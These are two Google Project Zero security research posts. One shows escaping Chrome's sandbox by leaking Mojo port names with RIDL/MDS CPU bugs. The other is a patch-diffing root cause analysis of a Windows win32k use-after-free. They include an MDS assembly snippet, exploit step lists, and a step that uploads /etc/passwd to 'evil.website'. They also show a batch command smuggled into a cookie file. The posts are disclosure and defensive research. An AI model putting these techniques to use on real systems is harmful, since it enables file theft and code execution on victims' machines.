🔒
There are new articles available, click to refresh the page.
Before yesterdayGoogle Project Zero

Escaping the Chrome Sandbox with RIDL

15 February 2020 at 17:02
By: Ben
Guest blog post by Stephen Röttger

tl;dr: Vulnerabilities that leak cross process memory can be exploited to escape the Chrome sandbox. An attacker is still required to compromise the renderer prior to mounting this attack. To protect against attacks on affected CPUs make sure your microcode is up to date and disable hyper-threading (HT).

In my last guest blog post “Trashing the Flow of Data” I described how to exploit a bug in Chrome’s JavaScript engine V8 to gain code execution in the renderer. For such an exploit to be useful, you will usually need to chain it with a second vulnerability since Chrome’s sandbox will limit your access to the OS and site isolation moved cross-site renderers into separate processes to prevent you from bypassing restrictions of the web platform.

In this post, we will take a look at the sandbox and in particular at the impact of RIDL and similar hardware vulnerabilities when used from a compromised renderer. Chrome’s IPC mechanism Mojo is based on secrets for message routing and leaking these secrets allows us to send messages to privileged interfaces and perform actions that the renderer shouldn’t be allowed to do. We will use this to read arbitrary local files as well as execute a .bat file outside of the sandbox on Windows. At the time of writing, both Apple and Microsoft are actively working on a fix to prevent this attack in collaboration with the Chrome security team.

Background

Here’s a simplified overview of what the Chrome process model looks like:
The renderer processes are in separate sandboxes and the access to the kernel is limited, e.g. via a seccomp filter on Linux or  win32k lockdown on Windows. But for the renderer to do anything useful, it needs to talk to other processes to perform various actions. For example, to load an image it will need to ask the network service to fetch it on its behalf.

The default mechanism for inter process communication in Chrome is called Mojo. Under the hood it supports message/data pipes and shared memory but you would usually use one of the higher level language bindings in C++, Java or JavaScript. That is, you create an interface with methods in a custom interface definition language (IDL), Mojo generates stubs for you in your language of choice and you just implement the functionality. To see what this looks like in practice, you can check out the URLLoaderFactory in .mojom IDL, C++ implementation and usage in the renderer.

One notable feature is that Mojo allows you to forward IPC endpoints over an existing channel. This is used extensively in the Chrome codebase, i.e. whenever you see a pending_receiver or pending_remote parameter in a .mojom file.

Under the hood, Mojo uses a platform specific message pipe between processes, or more specifically between nodes in Mojo. Two nodes can be connected directly with each other but they don’t have to since Mojo supports message routing. One node in the network is called the broker node which has some additional responsibilities to set up node channels and perform some actions restricted by the sandbox.

The IPC endpoints themselves are called ports. In the URLLoaderFactory example above, both the client and the implementation side are identified by a port. In code, a port looks like this:

class Port : public base::RefCountedThreadSafe<Port> {
 public:
  // [...]
  // The current State of the Port.
  State state;
  // The Node and Port address to which events should be routed FROM this Port.
  // Note that this is NOT necessarily the address of the Port currently sending
  // events TO this Port.
  NodeName peer_node_name;
  PortName peer_port_name;
  // The next available sequence number to use for outgoing user message events
  // originating from this port.
  uint64_t next_sequence_num_to_send;
  // [...]
}
The peer_node_name and peer_port_name above are both 128bit random integers used for addressing. If you send a message to a port, it will first forward it to the right node and the receiving node will look up the port name in a map of local ports and put the message into the right message queue.

Of course this means that if you have an info leak vulnerability in the browser process, you can leak port names and use them to inject messages into privileged IPC channels. And in fact, this is called out in the security section of the Mojo core documentation:
“[...] any Node can send any Message to any Port of any other Node so long as it has knowledge of the Port and Node names. [...] It is therefore important not to leak Port names into Nodes that shouldn't be granted the corresponding Capability.”
A good example of a bug that can be easily exploited to leak port numbers was crbug.com/779314 by @NedWilliamson. It was an integer overflow in the blob implementation which allowed you to read an arbitrary amount of heap memory in front of a blob in the browser process. The exploit would then look roughly as follows:
  1. Compromise the renderer.
  2. Use the blob bug to leak heap memory.
  3. Search through the memory for ports (a valid state + 16 high entropy bytes).
  4. Use the leaked ports to inject a message into a privileged IPC connection.
Next, we’ll look at two things. How to replace step 2. and 3. above with a CPU bug and what kind of primitives we can gain via privileged IPC connections.

RIDL

To exploit this behavior with a hardware vulnerability I was looking for a bug that allows you to leak memory across process boundaries. RIDL from the MDS attacks seems like the perfect candidate since it promises exactly this: it allows you to leak data from various internal buffers on affected CPUs. For details on how it works, check out the paper or the slides since they explain it much better than I could.

There were microcode and OS updates released to address the MDS attacks. However, if you read Intel’s deep dive on the topic you will note that the mitigations clear the affected buffers when switching to a less privileged execution context. If your CPU supports hyper threading, you will still be able to leak data from the second thread running on your physical core. The recommendation to address this is to either disable hyper threading or implement a group scheduler.

You can find multiple PoCs for the MDS vulnerabilities online, some of them already public since May 2019. The PoCs for the variants come with different properties:

  • They target either loads or stores.
  • Some require the secret to be flushed from the L1 cache.
  • You can either control the index in the 64 byte cache line to leak from or leak a 64 bit value from a previous access.
  • The speed varies a lot depending on both the variant and the exploit. The highest report I’ve seen is for Brandon Falk’s MLPDS exploit with 228kB/s. For comparison, a naive exploit on my machine only reaches 25kB/s.

The one property all variants share is that they are probabilistic in what gets leaked. While the RIDL paper describes some synchronization primitives to target certain values, you usually need to trigger a repeated access to the secret in order to leak it fully.

I ended up writing two exploits for Chrome using different MDS variants, one targeting a linux build on an Xeon Gold 6154 and one for Windows on a Core i7-7600U. I will describe both since they ended up posing different challenges when applying them in practice.

Microarchitectural Fill Buffer Data Sampling (MFBDS)

My first exploit was using MFBDS which targets the line fill buffer of the CPU. The PoC is very simple:
xbegin out            ; start TSX to catch segfault
mov   rax, [0]        ; read from page 0 => leaks a value from line fill buffer
; the rest will only execute speculatively
and   rax, 0xff       ; mask out one byte
shl   rax, 0xc        ; use as page index
add   rax, 0x13370000 ; add address of probe array
prefetchnta [rax]     ; access into probe array
xend
out: nop
After this, you will time the access to the probe array to see which index got cached.
You can change the 0 in the beginning to control the offset in the cache line for your leak. In addition, you want to implement a prefix or suffix filter on the leaked value as described in the paper as well. Note that this only leaks values that are not in the L1 cache, so you want to have a way to evict the secret from cache in between accesses.

For my first leak target, I picked a privileged URLLoaderFactory. As mentioned above, the URLLoaderFactory is used by the renderer to fetch network resources. It will enforce the same-origin policy (actually same-site) for your renderer to make sure you can’t break restrictions of the web platform. However, the browser process is also using URLLoaderFactories for different purposes and those have additional privileges. Besides ignoring the same-origin policy, they are also allowed to upload local files. Thus, if we can leak one of their port names we can use it to upload /etc/passwd to https://evil.website.

The next step will be to trigger a repeated access to the port name of a privileged loader. Getting the browser process to make network requests could be an option but seems to have too much overhead. I decided to target the port lookup in the node instead.
class COMPONENT_EXPORT(MOJO_CORE_PORTS) Node {
  // [...]
  std::unordered_map<LocalPortName, scoped_refptr<Port>> ports_;
  // [...]
}
Every node has a hash map that stores all local ports. If we send a message to a non-existent port, the target node will look it up in the map, see that it doesn’t exist and drop the message. If our port name lands in the same hash bucket as another port name, it will read the full hash of the unknown port to compare it with. This will also load the port name itself into the cache since it’s usually stored in the same cache line as the hash. MFBDS allows us to leak the whole cache line, even if a value didn’t get accessed directly.

The map starts with a bucket size of roughly 700 on a fresh Chrome instance and it grows mainly with the number of renderers. This makes the attack infeasible since we will have to brute force both the bucket index and the cache line offset (1 in 4 thanks to alignment). However, I noticed a code path that allows you to create a large amount of privileged URLLoaderFactories using service workers. If you create a service worker with navigation preload enabled, every top-level navigation would create such a loader. By simply creating a number of iframes and stalling the requests on the server side, you can keep a few thousand loaders alive at the same time and make the brute force much easier.

The only thing missing is to evict the target value from L1 cache. Simply padding our messages with 32KB of data seems to do the trick in practice since I assume the data will get loaded into the L1 cache in the victim and evict everything else.
To summarize the full exploit:

  1. Compromise the renderer.
  2. Run the RIDL exploit in $NUM_CPU-1 processes with varying cache line offsets.
  3. Install a service worker with navigation preload.
  4. Create lots of iframes and stall their requests.
  5. Send messages to the network process with random port names.
  6. If we collide on the bucket index, the process in 2. can leak the port name.
  7. Spoof a message to the URLLoaderFactory to upload local files to https://evil.website.

TSX Asynchronous Abort (TAA)

In November 2019 new variants of the MDS attacks were released and as the TAA PoC seemed to be faster than my MFBDS exploit, I decided to adapt it to the Chrome exploit. In addition, VUSec released an exploit that targets store operations which should allow us to get rid of the cache flushing requirement if we can get the secret to be written to different addresses in memory. This should happen if we can trigger the browser to send a message to a privileged port. In this scenario, the secret port name will also be prefixed by the node name and we can use the techniques from the RIDL paper to filter on it easily.

I also started looking for a better primitive and found that if I can talk to the NetworkService, it will allow me to create a new NetworkContext and thereby choose the file path of the sqlite3 database in which cookies are stored.

To find out how to trigger messages from the browser process to the NetworkService, I looked at the IPC methods in the interface to find one that looks like I might be able to influence it from a renderer. NetworkService.OnPeerToPeerConnectionsCountChange caught my eye and in fact, this method gets called every time when a WebRTC connection gets updated. You just have to create a fake WebRTC connection and everytime you mark it as connected/disconnected it will trigger a new message to the NetworkService.

Once we leak the port name from a compromised renderer, we gain the primitive to write a sqlite3 database with a fully controlled path.

While this didn’t sound very useful at first, you can actually abuse it to gain code execution. I noticed that Windows batch files are a very forgiving file format. If you have garbage at the beginning of the file, it will skip over it until the next “\r\n” and execute the next command from there. In my exploit, I use it to create a cookies.bat file in the user’s autorun directory, add a cookie with “\r\n” and a command in it and it will get executed on the next login.

In the end, this exploit ended up working in 1-2 minutes on average and consistently worked in under 5 minutes on my machine. And I’m sure that this can be vastly improved since I’ve seen lots of speed ups from small changes and different techniques. For example, MLPDS seems to be even faster in practice than the variant I am using.

Exploit summary:

  1. Compromise the renderer.
  2. Run the RIDL exploit in $NUM_CPU-1 processes with varying cache line offsets.
  3. Create a fake WebRTC connection and alternate between connected and disconnected.
  4. Leak the NetworkService port name.
  5. Create a new NetworkContext with a cookie file at c:\path\to\user\autorun\cookies.bat
  6. Insert the cookie “\r\ncalc.exe\r\n”.
  7. Wait for the next log in.

Summary

When I started working on this I was surprised that it’s still exploitable even though the vulnerabilities have been public for a while. If you read guidance on the topic, they will usually talk about how these vulnerabilities have been mitigated if your OS is up to date with a note that you should disable hyper threading to protect yourself fully. The focus on mitigations certainly gave me a false sense that the vulnerabilities have been addressed and I think these articles could be more clear on the impact of leaving hyper threading enabled.

That being said, I would like you to take away two things from this post. First, info leak bugs can be more than just an ASLR bypass. Even if it wasn’t for the reliance on secret port names, there would be other interesting data to leak, e.g. Chrome’s UnguessableTokens, Gmail cookies or sensitive data in other processes on the machine. If you have an idea how to find info leaks at scale, Chrome might be a good target.

Second, I ignored hardware vulnerabilities for the longest time since they are way out of my comfort zone. However, I hope that I can give you another data point on their impact with this blog post to help you make a decision if you should disable hyper-threading. There’s lots of room for exploration on what other software can be broken in similar ways and I would love to see more examples of applying hardware bugs to break software security boundaries.

TFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln

2 April 2020 at 16:32
By: Tim
Posted by Maddie Stone, Project Zero

INTRODUCTION

I’m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero’s ideas and goals around in-the-wild 0-days in a November blog post

On December’s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a blog post on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.

Without the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.

While my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It’s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.

But as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually CVE-2019-1433. I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That’s when I learned I’d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a detailed root cause analysis and POC for the “real” CVE-2019-1458 bug. With the “real” root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.

This blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the “wrong”, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.

MY PROCESS

When the vulnerability was disclosed on December’s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I’m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn’t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:
  1. Complete details about the specific vulnerability weren't available,
  2. It affected both Windows 7 and Windows 10, and
  3. The vulnerability is in win32k which is a core component of the Windows kernel.

I spent a few days trying to get a copy of the exploit, but wasn’t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:
  1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This “noise” includes things like Control Flow Guard, more inline instrumentation calls, and “weirder” compiler settings. 
  2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.
  3. Kaspersky’s blog post stated that not all Windows 10 builds were affected.

I got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.

Turns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked “Check for Updates” within the VM. Because I was new to Windows, I didn’t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the Microsoft Update Catalog. When Microsoft told me that I had analyzed the wrong vulnerability, that’s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn’t have gotten mixed up.

Once the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\Windows\System32\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.

Win32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it’s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.

On James Foreshaw’s recommendation, I cloned my VM so that one VM would run WinDbg and debug the other VM. This allows for kernel debugging.

Now that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it’s time to start patch diffing.

PATCH DIFFING WINDOWS 7 WIN32K.SYS

I decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [video, slides], and for me, BinDiff worked best “out of the box” so I decided to at least start with that again.

I loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn’t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)


Original BinDiff Matched Functions of win32k.sys without Symbols

When I started the diff, I didn’t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn’t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren’t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.


BinDiff Matched Function of win32k.sys with Symbols

What stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky’s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn’t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn’t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:

EXPLORING THE WRONG CHANGES

At this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had “bitmap” in the name and Kaspersky’s blog post talked about the use of bitmaps.

The changes to GreGetStringBitmapW didn’t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.


As shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it’s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.

I decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that “bitmap” was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.



The Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls here.  Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.

Tracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn’t be called when calling the functions listed in the blog post or trigger the task switch window.

I downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following this guide. Once I had a working “Hello, World”, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the “Switch” window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.

I then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the “highlight” to the different windows each time you press tab. I thought that, “Sure, that could involve animating a palette”, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn’t spend too long and moved on.

NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent

After these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky’s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.

As shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.

REVERSING THE VULNERABILITY

I had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn’t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn’t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.

For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *), gptiCurrent → global, pointer to thread info (tagTHREADINFO *).

This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it’s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.

At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.

RESOURCES

Here are some of the resources that were critical for me:
  • “Kernel Attacks Through User- Mode Callbacks” Blackhat USA 2011 talk by Tarjei Mandt [slides, video]
    • I learned about thread locking, assignment locking, and user-mode callbacks.
  • “One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild” by Jack Tang, Trend Micro Security Intelligence [blog]
    • This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.
  • “Kernel exploitation – r0 to r3 transitions via KeUserModeCallback” by Mateusz Jurczyk [blog]
    • This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.
  • “Windows Kernel Reference Count Vulnerabilities - Case Study” by Mateusz Jurczyk, Zero Nights 2012 [slides]
  • “Analyzing local privilege escalations in win32k” by mxatone, Uninformed v10 (10/2008) [article]
  • P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes

TIMELINE

  • Oct 31 2019: Chrome releases fix for CVE-2019-13720
  • Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. 
  • Dec 10-16 2019: I ask around for a copy of the exploit. No luck!
  • Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)
  • Dec 23 2019: VM is set-up. Start patch diffing
  • Dec 24-Jan 2: Holiday
  • Jan 2 - Jan 3: Look at other diffs that weren’t the vulnerability. Try to trigger DrawSwitchWndHilite
  • Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the “correct change”.)
  • Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.
  • Jan 16: Crash POC crashes!

Approximately 3 work weeks to set up a test environment, diff patches, and create crash POC. 

CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS

Bug class: use-after-free

OVERVIEW

The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent  nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.

DETAILED WALK THROUGH

This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available here.

ANALYZED SAMPLES

I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the “My Process” section.

Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)
Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)

OVERVIEW

This walk through is broken up into the following sections to describe the vulnerability:
  • Triggering xxxNextWindow
  • Freeing the tagQ (queue) structure
    • User-mode callback xxxMoveSwitchWndHilite
  •  Using the freed queue

TRIGGERING xxxNextWindow

The code path is triggered by a special set of keyboard inputs to open a “Sticky Task Switcher” window. As a side note, I didn’t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API:
<ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). 

The “normal” way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for “sticky”. However, this window won’t hit the vulnerable code path, xxxNextWindow. The “normal” task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the “normal” task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. 





"Normal" task switch window



Window that is displayed when xxxNextWindow is called

If this is the first “tab press” then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. 

FREEING THE QUEUE in xxxNextWindow

xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. 

At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. 

void __fastcall xxxNextWindow(tagQ *queue, int a2) {
[...]

V43 = 0;
while ( 1 ) {
    if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && 
          gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && 
          gspwndAltTab->bDestroyed == 0 )
        v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
    else
        v45 = 0i64;
    if ( !v45 ) {
        ThreadUnlock1();
        goto LABEL_106;
    }
    handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); USER MODE CALLBACK
    if ( v43 )
    {
        if ( v43 == handleOfNextWindowToHilite ) {
            v48 = 0i64;
LABEL_103:
            ThreadUnlock1();
            HMAssignmentLock(&gspwndActivate, v48);
            if ( !*(_QWORD *)&gspwndActivate )
                xxxCancelCoolSwitch();
            return;
        }
    } else { v43 = handleOfNextWindowToHilite; }
    tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);
    if ( tagWndPtrOfNextWindow )
        goto LABEL_103;
    isShiftPressed2 = isShiftPressed;
}

[...]

LABEL_106:
  v11 = queue->spwndActive;   USE AFTER FREE
  if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {

[...]

USER-MODE CALLBACK in xxxMoveSwitchWndHilite

There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.

This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.

 xxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it’s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented here

In the callback, we free the tagQ structure using AttachThreadInput. AttachThreadInput “attaches the input processing mechanism of one thread to that of another thread” and to do this, it destroys the queue of the thread that is being attached to another thread’s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:
  1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we’ll loop back to the top of the while loop.
  2. Once we’re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn’t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.

if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && 
     gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && 
     gspwndAltTab->bDestroyed == 0 )
    v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
else
    v45 = 0i64;

USING THE FREED QUEUE

Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.

WINDOWS 10 

CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.

Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)
Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)

I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.

*******************************************************************************
*                                                                             *
